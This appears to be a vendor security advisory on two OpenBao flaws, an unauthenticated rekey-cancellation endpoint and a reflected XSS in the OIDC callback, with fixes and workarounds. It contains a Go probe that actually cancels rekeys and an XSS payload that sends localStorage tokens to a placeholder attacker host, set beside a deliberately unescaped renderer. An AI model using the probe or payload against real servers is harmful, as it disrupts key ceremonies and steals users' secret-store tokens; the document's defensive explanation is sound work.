CVSS 9.5 | CVE-2025-52894 | CVE-2026-33758

OpenBao Patches XSS and Unauthenticated Rekey Cancellation

Critical OpenBao vulnerabilities patched! CVE-2026-33758 details XSS in OIDC auth. CVE-2025-52894 allows unauth rekey cancel. Update now!


Two new vulnerabilities have been identified in OpenBao: a reflected cross-site scripting (XSS) flaw in the OIDC login callback, and an unauthenticated endpoint that lets anyone who can reach the API cancel an in-progress root rekey or recovery-key rekey. Both are fixed in released versions, and users are urged to update as soon as practical.

CVE-2026-33758 carries a critical CVSS score of 9.5. Note that CVSS rates the severity of a successful attack; the likelihood that a flaw is actually exploited is estimated separately by the EPSS figures given below.

What is Github.com/openbao/openbao?

github.com/openbao/openbao is the Go module of OpenBao, an open-source secrets manager (a community fork of HashiCorp Vault under the Linux Foundation) that stores, generates and brokers access to credentials, keys and certificates. It is normally run as a server and reached over its HTTP API and the `bao` CLI, and it can also be imported into Go programs as a library. For more information, you can search all github.com/openbao/openbao CVEs.

CVE-2025-52894: Unauthenticated Rekey Cancellation in OpenBao

CVSS: not provided
Affected versions: OpenBao installations that do not include the fix (the remediation section below lists v2.3.1 as the patched release). Every such installation is exposed unless `disable_unauthed_rekey_endpoints=true` has been set explicitly in the server configuration; the default leaves the rekey endpoints reachable without a token.

EPSS score: 0.042, i.e. an estimated 4.2% probability of exploitation in the wild over the next 30 days, which is low.

OpenBao accepted unauthenticated requests to cancel a root rekey or recovery-key rekey that an operator had started. Because the cancel call requires no token, anyone who can reach the API listener can abort a rekey ceremony at will, a denial of service against a sensitive operational procedure: the operator has to restart the ceremony and collect unseal-share holders again. The issue does not disclose any secrets by itself.

How to fix CVE-2025-52894 in Github.com/openbao/openbao

Patch within 7 days
  1. Update to OpenBao v2.3.1 or later.
  2. If you cannot upgrade yet, set `disable_unauthed_rekey_endpoints=true` in the OpenBao server configuration and restart the server so that the rekey endpoints require authentication.
Update OpenBao
go get -u github.com/openbao/openbao@latest

Note that `go get` only refreshes a Go project that embeds OpenBao as a module. A deployed OpenBao server is upgraded by replacing its binary or container image and restarting it; confirm the running version afterwards with `bao version`.

Workaround: If the API sits behind a proxy or load balancer, block the cancel calls there: they are `DELETE` requests to `/v1/sys/rekey/init` and `/v1/sys/rekey-recovery-key/init`. Allow them only from the operator network that actually performs rekeys, and treat this as a stopgap: an IP allow-list cannot tell an authenticated operator from anyone else on the allowed network, and clients that reach the listener directly bypass the proxy rule entirely.
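The exposure is easy to check from the network side. The following Go program is an added example and not OpenBao's own code: it sends the unauthenticated cancel request (a `DELETE` with no token header) to both rekey endpoints of a server whose address you supply and reports whether the server accepted it. Run it only against a non-production instance, because against a vulnerable server the probe genuinely resets any rekey in progress. Treating any 2xx reply as "accepted" and any other reply as "refused" is an assumption about how the patched server answers.

```go
package main

import (
	"fmt"
	"net/http"
	"time"
)

// RekeyCancelPaths are the endpoints whose DELETE method cancels an
// in-progress root rekey and recovery-key rekey respectively (OpenBao
// inherits these API paths from Vault).
var RekeyCancelPaths = []string{
	"/v1/sys/rekey/init",
	"/v1/sys/rekey-recovery-key/init",
}

// ProbeRekeyCancel sends an unauthenticated DELETE to each rekey endpoint of
// the server at base (e.g. "https://bao.example:8200") and returns the HTTP
// status each endpoint answered with. No token header is set on purpose:
// that is exactly the request the vulnerability allows.
func ProbeRekeyCancel(base string, client *http.Client) (map[string]int, error) {
	if client == nil {
		client = &http.Client{Timeout: 10 * time.Second}
	}
	results := make(map[string]int, len(RekeyCancelPaths))
	for _, p := range RekeyCancelPaths {
		req, err := http.NewRequest(http.MethodDelete, base+p, nil)
		if err != nil {
			return nil, err
		}
		resp, err := client.Do(req)
		if err != nil {
			return nil, fmt.Errorf("%s: %w", p, err)
		}
		resp.Body.Close()
		results[p] = resp.StatusCode
	}
	return results, nil
}

// Exposed reports whether a status code means the server carried out the
// unauthenticated cancel. A vulnerable server replies 204 No Content (its
// ordinary "cancelled" answer); the assumption here is that a patched or
// hardened server refuses with a non-2xx status instead.
func Exposed(status int) bool {
	return status >= 200 && status < 300
}

func main() {
	// Constructed target for illustration; point this at a test instance.
	res, err := ProbeRekeyCancel("http://127.0.0.1:8200", nil)
	if err != nil {
		fmt.Println("probe failed:", err)
		return
	}
	for _, p := range RekeyCancelPaths {
		fmt.Printf("%-36s status %d exposed=%v\n", p, res[p], Exposed(res[p]))
	}
}
```

If either path reports exposed=true, the server still honours anonymous cancellation and needs the upgrade or the `disable_unauthed_rekey_endpoints=true` setting.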

NextGuard automatically flags CVE-2025-52894 if Github.com/openbao/openbao appears in any of your monitored projects — no manual lookup required.

CVE-2026-33758: Reflected XSS in OpenBao OIDC Authentication

CVSS: 9.5
Affected versions: OpenBao installations with the OIDC/JWT auth method enabled and at least one role configured with `callback_mode=direct`, the mode in which the OpenBao server itself renders the HTML page reporting the outcome of the provider callback. The vulnerable code path is only reached through roles in that mode.

Critical severity: this is not remote code execution on the server but script execution in the victim's browser, within the OpenBao server's origin. A crafted callback URL runs attacker-controlled JavaScript in that origin, from which it can read the browser storage used by the OpenBao web UI and exfiltrate a logged-in user's token, so the practical outcome is takeover of that user's access to secrets.

EPSS score: 0.121, i.e. an estimated 12.1% probability of exploitation over the next 30 days, which is moderate.

OpenBao's OIDC callback handler reflected the `error_description` query parameter into its HTML error message without escaping. The parameter is meant to carry the identity provider's error text, but it arrives in the URL the browser requests, so an attacker who gets a victim to open a crafted callback link can inject markup and script that runs as that user, for example to steal the session token. No compromise of the identity provider is needed.
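The bug class is easiest to see side by side. The Go program below is an added illustration, not OpenBao's actual handler: `VulnerableErrorPage` pastes `error_description` straight into HTML the way the flawed code did, while `HardenedErrorPage` renders the same page through `html/template`, whose contextual auto-escaping is the standard fix. The callback query and the payload are constructed for the example; the page layout is invented and the real OpenBao callback route is not reproduced.

```go
package main

import (
	"fmt"
	"html/template"
	"net/url"
	"strings"
)

// Payload is a constructed error_description that, if rendered as live
// markup, would ship the browser's localStorage (where a web UI may keep its
// token) to an attacker-chosen host. The host is a placeholder.
const Payload = `<script>fetch("https://attacker.invalid/?t="+encodeURIComponent(JSON.stringify(localStorage)))</script>`

// CallbackQuery builds the query string of a forged OIDC callback URL:
// error=access_denied plus the malicious description.
func CallbackQuery() url.Values {
	return url.Values{
		"error":             {"access_denied"},
		"error_description": {Payload},
	}
}

// VulnerableErrorPage reproduces the flaw in miniature: the untrusted
// parameter is formatted straight into the HTML body with no escaping.
func VulnerableErrorPage(query url.Values) string {
	desc := query.Get("error_description")
	return fmt.Sprintf("<html><body><h1>OIDC login failed</h1><p>%s</p></body></html>", desc)
}

// errorTmpl is the same page as a template. html/template escapes values
// according to where they land; inside <p>...</p> that means <, >, &, and
// quotes become entities, so the parameter can only ever be text.
var errorTmpl = template.Must(template.New("oidc-error").Parse(
	"<html><body><h1>OIDC login failed</h1><p>{{.}}</p></body></html>"))

// HardenedErrorPage is the fixed form with identical output shape.
func HardenedErrorPage(query url.Values) (string, error) {
	var sb strings.Builder
	if err := errorTmpl.Execute(&sb, query.Get("error_description")); err != nil {
		return "", err
	}
	return sb.String(), nil
}

// CarriesLiveScript is the check used by this example: does the rendered
// page contain the payload as markup the browser would execute?
func CarriesLiveScript(page string) bool {
	return strings.Contains(page, "<script>")
}

func main() {
	q := CallbackQuery()
	fmt.Println("vulnerable page carries live script:", CarriesLiveScript(VulnerableErrorPage(q)))
	hardened, err := HardenedErrorPage(q)
	if err != nil {
		panic(err)
	}
	fmt.Println("hardened page carries live script:  ", CarriesLiveScript(hardened))
	fmt.Println(hardened)
}
```

The same contrast holds for any reflected value, not just this parameter: a template engine that escapes by context, or an explicit `html.EscapeString` on every untrusted string, is what keeps the browser from reading attacker input as markup.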

How to fix CVE-2026-33758 in Github.com/openbao/openbao

Patch immediately
  1. Update to OpenBao v2.5.2 or later.
Update OpenBao
go get -u github.com/openbao/openbao@latest

As above, `go get` only refreshes a Go project that depends on the module; upgrade deployed servers by replacing the binary or container image and restarting them.

Workaround: Until you can patch, find the roles that use the direct callback mode (for a method mounted at `oidc`: `bao list auth/oidc/role`, then `bao read auth/oidc/role/<name>` and check the `callback_mode` field) and either switch them to another callback mode or delete them. Repeat for every OIDC/JWT mount.

NextGuard can help you monitor your go dependencies and alert you to vulnerabilities like CVE-2026-33758.

Stay ahead of Go vulnerabilities

Proactively manage your application security by identifying and remediating vulnerabilities. Use NextGuard to monitor your Go dependencies and receive alerts on new threats.

Start Monitoring


These vulnerabilities show why OpenBao servers need the same patch cadence as any other internet-facing service. Upgrade to v2.3.1 or later for the rekey issue and v2.5.2 or later for the XSS, and apply the configuration workarounds above wherever an upgrade has to wait. You can see all Go vulnerabilities on our platform.

Related topics

XSS, Denial of Service, Secrets Management, Go, OpenBao